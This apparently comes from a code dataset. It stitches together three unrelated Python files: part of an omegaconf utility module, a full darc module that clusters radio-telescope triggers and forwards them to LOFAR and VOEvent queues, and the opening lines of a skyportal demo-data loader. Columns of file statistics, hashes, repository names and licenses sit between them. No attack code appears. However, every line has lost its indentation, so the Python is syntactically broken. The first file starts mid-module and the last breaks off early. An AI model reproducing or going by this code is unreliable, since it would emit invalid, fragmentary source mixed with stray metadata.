def get_dict_key_value_types(ref_type: Any) -> Tuple[Any, Any]:
args = getattr(ref_type, "__args__", None)
if args is None:
bases = getattr(ref_type, "__orig_bases__", None)
if bases is not None and len(bases) > 0:
args = getattr(bases[0], "__args__", None)
key_type: Any
element_type: Any
if ref_type is None or ref_type == Dict:
key_type = Any
element_type = Any
else:
if args is not None:
key_type = args[0]
element_type = args[1]
else:
key_type = Any
element_type = Any
return key_type, element_type
def valid_value_annotation_type(type_: Any) -> bool:
return type_ is Any or is_primitive_type(type_) or is_structured_config(type_)
def _valid_dict_key_annotation_type(type_: Any) -> bool:
from omegaconf import DictKeyType
return type_ is None or type_ is Any or issubclass(type_, DictKeyType.__args__) # type: ignore
def is_primitive_type(type_: Any) -> bool:
type_ = get_type_of(type_)
return issubclass(type_, Enum) or type_ in (int, float, bool, str, type(None))
def _is_interpolation(v: Any, strict_interpolation_validation: bool = False) -> bool:
if isinstance(v, str):
ret = (
get_value_kind(v, strict_interpolation_validation)
== ValueKind.INTERPOLATION
)
assert isinstance(ret, bool)
return ret
return False
def _get_value(value: Any) -> Any:
from .base import Container
from .nodes import ValueNode
if isinstance(value, ValueNode):
return value._value()
elif isinstance(value, Container):
boxed = value._value()
if boxed is None or _is_missing_literal(boxed) or _is_interpolation(boxed):
return boxed
# return primitives and regular OmegaConf Containers as is
return value
def get_ref_type(obj: Any, key: Any = None) -> Optional[Type[Any]]:
from omegaconf import Container, Node
if isinstance(obj, Container):
if key is not None:
obj = obj._get_node(key)
else:
if key is not None:
raise ValueError("Key must only be provided when obj is a container")
if isinstance(obj, Node):
ref_type = obj._metadata.ref_type
if obj._is_optional() and ref_type is not Any:
return Optional[ref_type] # type: ignore
else:
return ref_type
else:
return Any # type: ignore
def _raise(ex: Exception, cause: Exception) -> None:
# Set the environment variable OC_CAUSE=1 to get a stacktrace that includes the
# causing exception.
env_var = os.environ["OC_CAUSE"] if "OC_CAUSE" in os.environ else None
debugging = sys.gettrace() is not None
full_backtrace = (debugging and not env_var == "0") or (env_var == "1")
if full_backtrace:
ex.__cause__ = cause
else:
ex.__cause__ = None
raise ex.with_traceback(sys.exc_info()[2]) # set env OC_CAUSE=1 for full backtrace
def format_and_raise(
node: Any,
key: Any,
value: Any,
msg: str,
cause: Exception,
type_override: Any = None,
) -> None:
from omegaconf import OmegaConf
from omegaconf.base import Node
if isinstance(cause, AssertionError):
raise
if isinstance(cause, OmegaConfBaseException) and cause._initialized:
ex = cause
if type_override is not None:
ex = type_override(str(cause))
ex.__dict__ = copy.deepcopy(cause.__dict__)
_raise(ex, cause)
object_type: Optional[Type[Any]]
object_type_str: Optional[str] = None
ref_type: Optional[Type[Any]]
ref_type_str: Optional[str]
child_node: Optional[Node] = None
if node is None:
full_key = key if key is not None else ""
object_type = None
ref_type = None
ref_type_str = None
else:
if key is not None and not node._is_none():
child_node = node._get_node(key, validate_access=False)
try:
full_key = node._get_full_key(key=key)
except Exception as exc:
# Since we are handling an exception, raising a different one here would
# be misleading. Instead, we display it in the key.
full_key = f"<unresolvable due to {type(exc).__name__}: {exc}>"
object_type = OmegaConf.get_type(node)
object_type_str = type_str(object_type)
ref_type = get_ref_type(node)
ref_type_str = type_str(ref_type)
msg = string.Template(msg).safe_substitute(
REF_TYPE=ref_type_str,
OBJECT_TYPE=object_type_str,
KEY=key,
FULL_KEY=full_key,
VALUE=value,
VALUE_TYPE=type_str(type(value), include_module_name=True),
KEY_TYPE=f"{type(key).__name__}",
)
if ref_type not in (None, Any):
template = dedent(
"""\
$MSG
full_key: $FULL_KEY
reference_type=$REF_TYPE
object_type=$OBJECT_TYPE"""
)
else:
template = dedent(
"""\
$MSG
full_key: $FULL_KEY
object_type=$OBJECT_TYPE"""
)
s = string.Template(template=template)
message = s.substitute(
REF_TYPE=ref_type_str, OBJECT_TYPE=object_type_str, MSG=msg, FULL_KEY=full_key
)
exception_type = type(cause) if type_override is None else type_override
if exception_type == TypeError:
exception_type = ConfigTypeError
elif exception_type == IndexError:
exception_type = ConfigIndexError
ex = exception_type(f"{message}")
if issubclass(exception_type, OmegaConfBaseException):
ex._initialized = True
ex.msg = message
ex.parent_node = node
ex.child_node = child_node
ex.key = key
ex.full_key = full_key
ex.value = value
ex.object_type = object_type
ex.object_type_str = object_type_str
ex.ref_type = ref_type
ex.ref_type_str = ref_type_str
_raise(ex, cause)
def type_str(t: Any, include_module_name: bool = False) -> str:
is_optional, t = _resolve_optional(t)
if t is None:
return type(t).__name__
if t is Any:
return "Any"
if t is ...:
return "..."
if sys.version_info < (3, 7, 0): # pragma: no cover
# Python 3.6
if hasattr(t, "__name__"):
name = str(t.__name__)
else:
if t.__origin__ is not None:
name = type_str(t.__origin__)
else:
name = str(t)
if name.startswith("typing."):
name = name[len("typing.") :]
else: # pragma: no cover
# Python >= 3.7
if hasattr(t, "__name__"):
name = str(t.__name__)
else:
if t._name is None:
if t.__origin__ is not None:
name = type_str(
t.__origin__, include_module_name=include_module_name
)
else:
name = str(t._name)
args = getattr(t, "__args__", None)
if args is not None:
args = ", ".join(
[type_str(t, include_module_name=include_module_name) for t in t.__args__]
)
ret = f"{name}[{args}]"
else:
ret = name
if include_module_name:
if (
hasattr(t, "__module__")
and t.__module__ != "builtins"
and t.__module__ != "typing"
and not t.__module__.startswith("omegaconf.")
):
module_prefix = t.__module__ + "."
else:
module_prefix = ""
ret = module_prefix + ret
if is_optional:
return f"Optional[{ret}]"
else:
return ret
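# Usage sketch (editor's addition; the exact strings may vary slightly across Python versions):
#   type_str(int)            -> "int"
#   type_str(Optional[int])  -> "Optional[int]"
#   type_str(Dict[str, int]) -> "Dict[str, int]"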
def _ensure_container(target: Any, flags: Optional[Dict[str, bool]] = None) -> Any:
from omegaconf import OmegaConf
if is_primitive_container(target):
assert isinstance(target, (list, dict))
target = OmegaConf.create(target, flags=flags)
elif is_structured_config(target):
target = OmegaConf.structured(target, flags=flags)
elif not OmegaConf.is_config(target):
raise ValueError(
"Invalid input. Supports one of "
+ "[dict,list,DictConfig,ListConfig,dataclass,dataclass instance,attr class,attr class instance]"
)
return target
def is_generic_list(type_: Any) -> bool:
"""
Checks if a type is a generic list, for example:
list returns False
typing.List returns False
typing.List[T] returns True
:param type_: variable type
:return: bool
"""
return is_list_annotation(type_) and get_list_element_type(type_) is not None
def is_generic_dict(type_: Any) -> bool:
"""
Checks if a type is a generic dict, for example:
dict returns False
typing.Dict returns False
typing.Dict[str, int] returns True
:param type_: variable type
:return: bool
"""
return is_dict_annotation(type_) and len(get_dict_key_value_types(type_)) > 0
def is_container_annotation(type_: Any) -> bool:
return is_list_annotation(type_) or is_dict_annotation(type_)
def split_key(key: str) -> List[str]:
"""
Split a full key path into its individual components.
This is similar to `key.split(".")` but also works with the getitem syntax:
"a.b" -> ["a", "b"]
"a[b]" -> ["a, "b"]
".a.b[c].d" -> ["", "a", "b", "c", "d"]
"[a].b" -> ["a", "b"]
"""
# Obtain the first part of the key (in docstring examples: a, a, .a, '')
first = KEY_PATH_HEAD.match(key)
assert first is not None
first_stop = first.span()[1]
# `tokens` will contain all elements composing the key.
tokens = key[0:first_stop].split(".")
# Optimization in case `key` has no other component: we are done.
if first_stop == len(key):
return tokens
if key[first_stop] == "[" and not tokens[-1]:
# This is a special case where the first key starts with brackets, e.g.
# [a] or ..[a]. In that case there is an extra "" in `tokens` that we
# need to get rid of:
# [a] -> tokens = [""] but we would like []
# ..[a] -> tokens = ["", "", ""] but we would like ["", ""]
tokens.pop()
# Identify other key elements (in docstring examples: b, b, b/c/d, b)
others = KEY_PATH_OTHER.findall(key[first_stop:])
# There are two groups in the `KEY_PATH_OTHER` regex: one for keys starting
# with a dot (.b, .d) and one for keys starting with a bracket ([b], [c]).
# Only one group can be non-empty.
tokens += [dot_key if dot_key else bracket_key for dot_key, bracket_key in others]
return tokens
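# Usage sketch (editor's addition; mirrors the docstring examples above):
#   split_key("a.b")       -> ["a", "b"]
#   split_key("a[b]")      -> ["a", "b"]
#   split_key(".a.b[c].d") -> ["", "a", "b", "c", "d"]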
# Similar to Python 3.7+'s `contextlib.nullcontext` (which should be used instead,
# once support for Python 3.6 is dropped).
@contextmanager
def nullcontext(enter_result: Any = None) -> Iterator[Any]:
yield enter_result
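# Usage sketch (editor's addition; `lock` and `use_lock` are hypothetical names):
#   cm = lock if use_lock else nullcontext()
#   with cm:
#       ...  # the block runs the same way whether or not a real context manager is used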
| 30.849231
| 109
| 0.619423
| 3,937
| 30,078
| 4.488951
| 0.128524
| 0.013863
| 0.012222
| 0.001811
| 0.303288
| 0.257568
| 0.186726
| 0.160358
| 0.156284
| 0.136253
| 0
| 0.004698
| 0.27821
| 30,078
| 974
| 110
| 30.880903
| 0.809351
| 0.159618
| 0
| 0.26003
| 0
| 0.001486
| 0.048523
| 0.008652
| 0
| 0
| 0
| 0
| 0.010401
| 1
| 0.087667
| false
| 0
| 0.056464
| 0.019316
| 0.291233
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
134ae941abed7aefa64cace4d2b745626ee1b2ee
| 28,935
|
py
|
Python
|
darc/amber_clustering.py
|
loostrum/darc
|
977f43652ff4fc873340d09ac0fddeb81b889541
|
[
"Apache-2.0"
] | null | null | null |
darc/amber_clustering.py
|
loostrum/darc
|
977f43652ff4fc873340d09ac0fddeb81b889541
|
[
"Apache-2.0"
] | 47
|
2019-08-27T08:07:06.000Z
|
2022-03-04T10:10:40.000Z
|
darc/amber_clustering.py
|
loostrum/darc
|
977f43652ff4fc873340d09ac0fddeb81b889541
|
[
"Apache-2.0"
] | 1
|
2020-11-24T09:27:56.000Z
|
2020-11-24T09:27:56.000Z
|
#!/usr/bin/env python3
#
# AMBER Clustering
import os
from time import sleep
import yaml
import ast
import threading
import multiprocessing as mp
import numpy as np
from astropy.time import Time, TimeDelta
import astropy.units as u
from astropy.coordinates import SkyCoord
from darc import DARCBase, VOEventQueueServer, LOFARTriggerQueueServer
from darc.definitions import TSAMP, NCHAN, BANDWIDTH, MASTER, TIME_UNIT
from darc.external import tools
from darc import util
class AMBERClusteringException(Exception):
pass
class AMBERClustering(DARCBase):
"""
Trigger IQUV / LOFAR / VOEvent system based on AMBER candidates
1. Cluster incoming triggers
2. Apply thresholds (separate for known and new sources, and for IQUV vs LOFAR)
3. Put IQUV triggers on output queue
4. Put LOFAR triggers on remote LOFAR trigger queue and on VOEvent queue
"""
def __init__(self, *args, connect_vo=True, connect_lofar=True, **kwargs):
"""
:param bool connect_vo: Whether or not to connect to VOEvent queue on master node
:param bool connect_lofar: Whether or not to connect to LOFAR trigger queue on master node
"""
super(AMBERClustering, self).__init__(*args, **kwargs)
self.connect_vo = connect_vo
self.connect_lofar = connect_lofar
self.dummy_queue = mp.Queue()
self.threads = {}
self.hdr_mapping = {}
self.obs_config = None
self.observation_running = False
self.amber_triggers = []
self.source_list = None
self.lock = mp.Lock()
# store when we are allowed to do IQUV / LOFAR triggering
self.time_iquv = Time.now()
# connect to VOEvent generator
if self.connect_vo:
try:
self.vo_queue = self.voevent_connector()
self.logger.info("Connected to VOEvent Generator on master node")
self.have_vo = True
except Exception as e:
self.logger.error("Failed to connect to VOEvent Generator, setting dummy queue ({})".format(e))
self.vo_queue = self.dummy_queue
self.have_vo = False
else:
# dummy queue
self.logger.info("VO Generator connection disabled, setting dummy queue")
self.vo_queue = mp.Queue()
self.have_vo = False
# connect to LOFAR trigger
if self.connect_lofar:
try:
self.lofar_queue = self.lofar_connector()
self.logger.info("Connected to LOFAR Trigger on master node")
self.have_lofar = True
except Exception as e:
self.logger.error("Failed to connect to LOFAR Trigger, setting dummy queue ({})".format(e))
self.lofar_queue = self.dummy_queue
self.have_lofar = False
else:
# dummy queue
self.logger.info("LOFAR Trigger connection disabled, setting dummy queue")
self.lofar_queue = mp.Queue()
self.have_lofar = False
def _load_source_list(self):
"""
Load the list with known source DMs
:return: source list with dict per category
"""
try:
with open(self.source_file, 'r') as f:
source_list = yaml.load(f, Loader=yaml.SafeLoader)
except OSError as e:
raise AMBERClusteringException("Cannot load source list: {}".format(e))
return source_list
def process_command(self, command):
"""
Process command received from queue
:param dict command: Command to process
"""
if command['command'] == 'trigger':
if not self.observation_running:
self.logger.error("Trigger(s) received but no observation is running - ignoring")
else:
with self.lock:
self.amber_triggers.append(command['trigger'])
elif command['command'] == 'get_attr':
self.get_attribute(command)
else:
self.logger.error("Unknown command received: {}".format(command['command']))
def start_observation(self, obs_config, reload=True):
"""
Parse obs config and start listening for amber triggers on queue
:param dict obs_config: Observation configuration
:param bool reload: reload service settings (default: True)
"""
# reload config
if reload:
self.load_config()
# clean any old triggers
self.amber_triggers = []
# parse parset
obs_config['parset'] = self._load_parset(obs_config)
# set config
self.obs_config = obs_config
self.observation_running = True
# (re)load source list in case of changes
self.source_list = self._load_source_list()
# try connecting to VO server if enabled
# always do this in case a connection was available before, but failed at some point
if self.connect_vo:
try:
self.vo_queue = self.voevent_connector()
self.logger.info("Connected to VOEvent Generator on master node")
self.have_vo = True
except Exception as e:
self.logger.error("Failed to connect to VOEvent Generator, setting dummy queue ({})".format(e))
self.vo_queue = self.dummy_queue
self.have_vo = False
# try connecting to LOFAR trigger server if enabled
# always do this in case a connection was available before, but failed at some point
if self.connect_lofar:
try:
self.lofar_queue = self.lofar_connector()
self.logger.info("Connected to LOFAR Trigger on master node")
self.have_lofar = True
except Exception as e:
self.logger.error("Failed to connect to LOFAR Trigger, setting dummy queue ({})".format(e))
self.lofar_queue = self.dummy_queue
self.have_lofar = False
# process triggers in thread
self.threads['processing'] = threading.Thread(target=self._process_triggers)
self.threads['processing'].start()
self.logger.info("Observation started")
def stop_observation(self, *args, **kwargs):
"""
Stop observation
"""
# set running to false
self.observation_running = False
# clear triggers
self.amber_triggers = []
# clear header
self.hdr_mapping = {}
# clear config
self.obs_config = None
# clear threads
for key, thread in self.threads.items():
if thread is not None:
thread.join()
self.threads[key] = None
def voevent_connector(self):
"""
Connect to the VOEvent generator on the master node
"""
# Load VO server settings
VOEventQueueServer.register('get_queue')
with open(self.config_file, 'r') as f:
server_config = yaml.load(f, Loader=yaml.SafeLoader)['voevent_generator']
port = server_config['server_port']
key = server_config['server_auth'].encode()
server = VOEventQueueServer(address=(MASTER, port), authkey=key)
server.connect()
return server.get_queue()
def lofar_connector(self):
"""
Connect to the LOFAR triggering system on the master node
"""
# Load LOFAR trigger server settings
LOFARTriggerQueueServer.register('get_queue')
with open(self.config_file, 'r') as f:
server_config = yaml.load(f, Loader=yaml.SafeLoader)['lofar_trigger']
port = server_config['server_port']
key = server_config['server_auth'].encode()
server = LOFARTriggerQueueServer(address=(MASTER, port), authkey=key)
server.connect()
return server.get_queue()
def _get_source(self):
"""
Try to get DM for a known source
:return: DM for known source, else None
"""
# get source name from parset
try:
source = self.obs_config['parset']['task.source.name']
except KeyError:
self.logger.error("Cannot get source name from parset, will not do known-source triggering")
return None, None, None
# check if source is in source list
# first check aliases
try:
alias = self.source_list['aliases'][source]
except KeyError:
# not found
pass
else:
# replace source by alias so we can look it up in other lists
self.logger.info("Using alias {} for source {}".format(alias, source))
source = alias
# check if source is a known pulsar or frb
dm_src = None
src_type = None
for key in ['pulsars', 'frbs']:
try:
dm_src = self.source_list[key][source]
src_type = key[:-1]
except KeyError:
pass
else:
break
return dm_src, src_type, source
def _check_triggers(self, triggers, sys_params, utc_start, datetimesource, dm_min=0, dm_max=np.inf, dm_src=None,
width_max=np.inf, snr_min=8, src_type=None, src_name=None, dmgal=0, pointing=None,
skip_lofar=False):
"""
Cluster triggers and run IQUV and/or LOFAR triggering
:param list triggers: Raw triggers
:param dict sys_params: System parameters (dt, delta_nu_MHz, nu_GHz)
:param str utc_start: start time of observation, in format readable by astropy.time.Time
:param str datetimesource: Field name with date and time
:param float dm_min: minimum DM (default: 0)
:param float dm_max: maximum DM (default: inf)
:param float dm_src: DM of known source (default: None)
:param float width_max: maximum width (default: inf)
:param float snr_min: minimum S/N (default: 8)
:param str src_type: Source type (pulsar, frb, None)
:param str src_name: Source name (default: None)
:param float dmgal: galactic maximum DM
:param astropy.coordinates.SkyCoord pointing: Pointing for LOFAR triggering (default: None)
:param bool skip_lofar: Skip LOFAR triggering (default: False)
"""
# cluster using IQUV thresholds
# LOFAR thresholds are assumed to be more strict for every parameter
cluster_snr, cluster_dm, cluster_time, cluster_downsamp, cluster_sb, _, ncand_per_cluster = \
tools.get_triggers(triggers,
dm_min=dm_min, dm_max=dm_max, sig_thresh=snr_min, t_window=self.clustering_window,
read_beam=True, return_clustcounts=True, sb_filter=self.sb_filter,
sb_filter_period_min=self.sb_filter_period_min,
sb_filter_period_max=self.sb_filter_period_max,
**sys_params)
# select on width
mask = np.array(cluster_downsamp) <= width_max
cluster_snr = np.array(cluster_snr)[mask]
cluster_dm = np.array(cluster_dm)[mask]
cluster_time = np.array(cluster_time)[mask]
cluster_downsamp = np.array(cluster_downsamp)[mask].astype(int)
cluster_sb = np.array(cluster_sb)[mask].astype(int)
ncand_per_cluster = np.array(ncand_per_cluster)[mask].astype(int)
ncluster = len(cluster_snr)
if src_type is not None:
known = 'known'
else:
known = 'new'
self.logger.info("Clustered {} raw triggers into {} IQUV trigger(s) "
"for {} source".format(len(triggers), ncluster, known))
# return if there are no clusters
if ncluster == 0:
return
# there are clusters, do IQUV triggering
# check if we can do triggering
now = Time.now()
if now < self.time_iquv:
self.logger.warning("Cannot trigger IQUV yet, next possible time: {}".format(self.time_iquv))
else:
self.logger.info("Sending IQUV trigger")
# update last trigger time
self.time_iquv = now + TimeDelta(self.thresh_iquv['interval'], format='sec')
# trigger IQUV
dada_triggers = []
for i in range(ncluster):
# send known source dm if available
if dm_src is not None:
dm_to_send = dm_src
else:
dm_to_send = cluster_dm[i]
dada_trigger = {'stokes': 'IQUV', 'dm': dm_to_send, 'beam': cluster_sb[i],
'width': cluster_downsamp[i], 'snr': cluster_snr[i],
'time': cluster_time[i], 'utc_start': utc_start}
dada_triggers.append(dada_trigger)
self.target_queue.put({'command': 'trigger', 'trigger': dada_triggers})
# skip LOFAR triggering for pulsars or if explicitly disabled
if src_type == 'pulsar' or skip_lofar:
return
# select LOFAR thresholds
if src_type is not None:
# known source, use same DM threshold as IQUV, but apply width and S/N thresholds
# DM_min effectively does nothing here because the value is the same as for IQUV
# but it needs to be defined for the mask = line below to work
# no limit on candidates per cluster
snr_min_lofar = self.thresh_lofar['snr_min']
dm_min_lofar = dm_min
width_max_lofar = self.thresh_lofar['width_max']
max_cands_per_cluster = np.inf
# Overrides for specific sources
if src_name in self.lofar_trigger_sources:
# check CB number
try:
allowed_cbs = self.thresh_lofar_override['cb']
if isinstance(allowed_cbs, float):
allowed_cbs = [allowed_cbs]
if self.obs_config['beam'] not in allowed_cbs:
return
except KeyError:
# any CB is valid if cb key is not present
pass
else:
# source known, CB valid: set thresholds
snr_min_lofar = self.thresh_lofar_override['snr_min']
width_max_lofar = self.thresh_lofar_override['width_max']
self.logger.warning("Setting LOFAR trigger thresholds: S/N > {}, "
"downsamp <= {}".format(snr_min_lofar, width_max_lofar))
else:
# new source, apply all LOFAR thresholds
snr_min_lofar = self.thresh_lofar['snr_min']
dm_min_lofar = max(dmgal * self.thresh_lofar['dm_frac_min'], self.dm_min_global)
width_max_lofar = self.thresh_lofar['width_max']
max_cands_per_cluster = self.thresh_lofar['max_cands_per_cluster']
# create mask for given thresholds
# also remove triggers where number of raw candidates is too high (this indicates RFI)
mask = (cluster_snr >= snr_min_lofar) & (cluster_dm >= dm_min_lofar) & \
(cluster_downsamp <= width_max_lofar) & \
(ncand_per_cluster <= max_cands_per_cluster)
# check for any remaining triggers
if np.any(mask):
ncluster = np.sum(mask)
self.logger.info("Found {} possible LOFAR trigger(s)".format(ncluster))
# note: the server keeps track of when LOFAR triggers were sent
# and whether or not a new trigger can be sent
# check if there are multiple triggers
if ncluster > 1:
self.logger.info("Multiple triggers - selecting trigger with highest S/N")
# argmax also works if there is one trigger, so just run it always
ind = np.argmax(cluster_snr[mask])
# estimate flux density based on peak S/N and width
snr = cluster_snr[mask][ind]
width = TSAMP.to(u.ms) * cluster_downsamp[mask][ind]
# astropy units only knows mJy, but the VOEvent Generator expects Jy
flux = util.get_flux(snr, width).to(u.mJy).value / 1000.
# select known source DM if available
if dm_src is not None:
dm_to_send = dm_src
dm_err = 0.
else:
dm_to_send = cluster_dm[mask][ind]
# set DM uncertainty to DM delay across pulse width
# Apertif has roughly 1 DM unit = 1 ms delay across band
dm_err = width.to(u.ms).value
# calculate arrival time at reference frequency = central frequency
cent_freq = sys_params['nu_GHz'] * 1000.
max_freq = cent_freq + .5 * BANDWIDTH.to(u.MHz).value
dm_delay = 4.148808E3 * dm_to_send * (cent_freq**-2 - max_freq**-2)
utc_arr = (utc_start + TimeDelta(cluster_time[mask][ind] - dm_delay, format='sec')).isot
# set a source name
if src_type is not None:
name = src_type
else:
name = 'candidate'
# check whether or not pointing information is available
if pointing is None:
self.logger.error("No pointing information available - cannot trigger LOFAR")
# check if we are connected to the server
elif not self.have_lofar:
self.logger.error("No LOFAR Trigger connection available - cannot trigger LOFAR")
# do the trigger
else:
# create the full trigger and put on VO queue
lofar_trigger = {'dm': dm_to_send,
'dm_err': dm_err,
'width': width.to(u.ms).value, # ms
'snr': snr,
'flux': flux, # Jy
'ra': pointing.ra.deg, # decimal deg
'dec': pointing.dec.deg, # decimal deg
'cb': self.obs_config['beam'],
'sb': cluster_sb[mask][ind],
'ymw16': dmgal,
'semiMaj': 15, # arcmin, CB
'semiMin': 15, # arcmin, CB
'name': name,
'src_name': src_name,
'datetimesource': datetimesource,
'utc': utc_arr,
'tarr': cluster_time[mask][ind],
'importance': 0.1}
# add system parameters (dt, central freq (GHz), bandwidth (MHz))
lofar_trigger.update(sys_params)
self.logger.info("Sending LOFAR trigger to LOFAR Trigger system")
self.lofar_queue.put(lofar_trigger)
if self.have_vo:
self.logger.info("Sending same trigger to VOEvent system")
self.vo_queue.put(lofar_trigger)
else:
self.logger.error("No VOEvent Generator connection available - not sending VO trigger")
def _process_triggers(self):
"""
Read thresholds (DM, width, S/N) for clustering
Continuously read AMBER triggers from queue and start processing for known and/or new sources
"""
# set observation parameters
utc_start = Time(self.obs_config['startpacket'] / TIME_UNIT, format='unix')
datetimesource = self.obs_config['datetimesource']
dt = TSAMP.to(u.second).value
chan_width = (BANDWIDTH / float(NCHAN)).to(u.MHz).value
cent_freq = (self.obs_config['min_freq'] * u.MHz + 0.5 * BANDWIDTH).to(u.GHz).value
sys_params = {'dt': dt, 'delta_nu_MHz': chan_width, 'nu_GHz': cent_freq}
pointing = self._get_pointing()
dmgal = util.get_ymw16(self.obs_config['parset'], self.obs_config['beam'], self.logger)
# get known source dm and type
dm_src, src_type, src_name = self._get_source()
if src_type is not None:
thresh_src = {'dm_src': dm_src,
'src_type': src_type,
'src_name': src_name,
'dm_min': max(dm_src - self.dm_range, self.dm_min_global),
'dm_max': dm_src + self.dm_range,
'width_max': np.inf,
'snr_min': self.snr_min_global,
'pointing': pointing,
'dmgal': dmgal
}
self.logger.info("Setting {src_name} trigger DM range to {dm_min} - {dm_max}, "
"max downsamp={width_max}, min S/N={snr_min}".format(**thresh_src))
# set min and max DM for new sources with unknown DM
thresh_new = {'src_type': None,
'src_name': None,
'dm_min': max(dmgal * self.thresh_iquv['dm_frac_min'], self.dm_min_global),
'dm_max': np.inf,
'width_max': self.thresh_iquv['width_max'],
'snr_min': self.thresh_iquv['snr_min'],
'pointing': pointing,
'dmgal': dmgal
}
# if known source, check whether or not LOFAR triggering should be enabled for new sources
if src_type is not None and src_name in self.lofar_trigger_sources:
thresh_new['skip_lofar'] = not self.thresh_lofar['trigger_on_new_sources']
else:
thresh_new['skip_lofar'] = False
self.logger.info("Setting new source trigger DM range to {dm_min} - {dm_max}, "
"max downsamp={width_max}, min S/N={snr_min}, skip LOFAR "
"triggering={skip_lofar}".format(**thresh_new))
# main loop
while self.observation_running:
if self.amber_triggers:
# Copy the triggers so the class-wide list can receive new triggers without those getting lost
with self.lock:
triggers = self.amber_triggers
self.amber_triggers = []
# check for header (always, because it is received once for every amber instance)
if not self.hdr_mapping:
for trigger in triggers:
if trigger.startswith('#'):
# read header, remove comment symbol
header = trigger.split()[1:]
self.logger.info("Received header: {}".format(header))
# Check if all required params are present and create mapping to col index
keys = ['beam_id', 'integration_step', 'time', 'DM', 'SNR']
for key in keys:
try:
self.hdr_mapping[key] = header.index(key)
except ValueError:
self.logger.error("Key missing from clusters header: {}".format(key))
self.hdr_mapping = {}
return
# header should be present now
if not self.hdr_mapping:
self.logger.error("First clusters received but header not found")
continue
# remove headers from triggers (i.e. any trigger starting with #)
triggers = [trigger for trigger in triggers if not trigger.startswith('#')]
# triggers is empty if only header was received
if not triggers:
self.logger.info("Only header received - Canceling processing")
continue
# split strings and convert to numpy array
try:
triggers = np.array(list(map(lambda val: val.split(), triggers)), dtype=float)
except Exception as e:
self.logger.error("Failed to process triggers: {}".format(e))
continue
# pick columns to feed to clustering algorithm
triggers_for_clustering = triggers[:, (self.hdr_mapping['DM'], self.hdr_mapping['SNR'],
self.hdr_mapping['time'], self.hdr_mapping['integration_step'],
self.hdr_mapping['beam_id'])]
# known source and new source triggering, in thread so clustering itself does not
# delay next run
# known source triggering
if src_type is not None:
self.threads['trigger_known_source'] = threading.Thread(target=self._check_triggers,
args=(triggers_for_clustering, sys_params,
utc_start, datetimesource),
kwargs=thresh_src)
self.threads['trigger_known_source'].start()
# new source triggering
self.threads['trigger_new_source'] = threading.Thread(target=self._check_triggers,
args=(triggers_for_clustering, sys_params,
utc_start, datetimesource),
kwargs=thresh_new)
self.threads['trigger_new_source'].start()
sleep(self.interval)
self.logger.info("Observation finished")
def _get_pointing(self):
"""
Get pointing of this CB from parset
:return: pointing SkyCoord
"""
# read parset
try:
parset = self.obs_config['parset']
except KeyError as e:
self.logger.error("Cannot read parset ({})".format(e))
return None
# read beam
try:
beam = self.obs_config['beam']
except KeyError as e:
self.logger.error("Cannot read beam from parset, setting CB to 0 ({})".format(e))
beam = 0
# read beam coordinates from parset
try:
key = "task.beamSet.0.compoundBeam.{}.phaseCenter".format(beam)
c1, c2 = ast.literal_eval(parset[key].replace('deg', ''))
c1 = c1 * u.deg
c2 = c2 * u.deg
except Exception as e:
self.logger.error("Could not parse pointing for CB{:02d} ({})".format(beam, e))
return None
# convert HA to RA if HADEC is used
if parset['task.directionReferenceFrame'].upper() == 'HADEC':
# Get RA at the mid point of the observation
timestamp = Time(parset['task.startTime']) + .5 * float(parset['task.duration']) * u.s
c1, c2 = util.radec_to_hadec(c1, c2, timestamp)
# create SkyCoord object
pointing = SkyCoord(c1, c2)
return pointing
def _load_parset(self, obs_config):
"""
Load the observation parset
:param dict obs_config: Observation config
:return: parset as dict
"""
try:
# encoded parset is already in config on master node
# decode the parset
raw_parset = util.decode_parset(obs_config['parset'])
# convert to dict and store
parset = util.parse_parset(raw_parset)
except KeyError:
self.logger.info("Observation parset not found in input config, looking for master parset")
# Load the parset from the master parset file
master_config_file = os.path.join(obs_config['master_dir'], 'parset', 'darc_master.parset')
try:
# Read raw config
with open(master_config_file) as f:
master_config = f.read().strip()
# Convert to dict
master_config = util.parse_parset(master_config)
# extract obs parset and decode
raw_parset = util.decode_parset(master_config['parset'])
parset = util.parse_parset(raw_parset)
except Exception as e:
self.logger.warning(
"Failed to load parset from master config file {}, "
"setting parset to None: {}".format(master_config_file, e))
parset = None
return parset
| 44.930124
| 118
| 0.55718
| 3,316
| 28,935
| 4.707479
| 0.145054
| 0.025625
| 0.017937
| 0.007495
| 0.240423
| 0.201986
| 0.174375
| 0.148815
| 0.148815
| 0.140807
| 0
| 0.003566
| 0.36029
| 28,935
| 643
| 119
| 45
| 0.839762
| 0.207258
| 0
| 0.340686
| 0
| 0
| 0.136229
| 0.007971
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029412
| false
| 0.009804
| 0.036765
| 0
| 0.102941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
134b9c14653c7fb4e1904d66229452a0dbe85152
| 9,811
|
py
|
Python
|
tools/load_demo_data.py
|
glenn2763/skyportal
|
79dc11bfe08076d9c1f920bad85681ab001e22c8
|
[
"BSD-3-Clause"
] | null | null | null |
tools/load_demo_data.py
|
glenn2763/skyportal
|
79dc11bfe08076d9c1f920bad85681ab001e22c8
|
[
"BSD-3-Clause"
] | null | null | null |
tools/load_demo_data.py
|
glenn2763/skyportal
|
79dc11bfe08076d9c1f920bad85681ab001e22c8
|
[
"BSD-3-Clause"
] | null | null | null |
import datetime
import os
import subprocess
import base64
from pathlib import Path
import shutil
import pandas as pd
import signal
import requests
from baselayer.app.env import load_env
from baselayer.app.model_util import status, create_tables, drop_tables
from social_tornado.models import TornadoStorage
from skyportal.models import init_db, Base, DBSession, Source, User
from skyportal.model_util import setup_permissions, create_token
from skyportal.tests import api
from baselayer.tools.test_frontend import verify_server_availability
if __name__ == "__main__":
"""Insert test data"""
env, cfg = load_env()
basedir = Path(os.path.dirname(__file__)) / ".."
with status(f"Connecting to database {cfg['database']['database']}"):
init_db(**cfg["database"])
with status("Dropping all tables"):
drop_tables()
with status("Creating tables"):
create_tables()
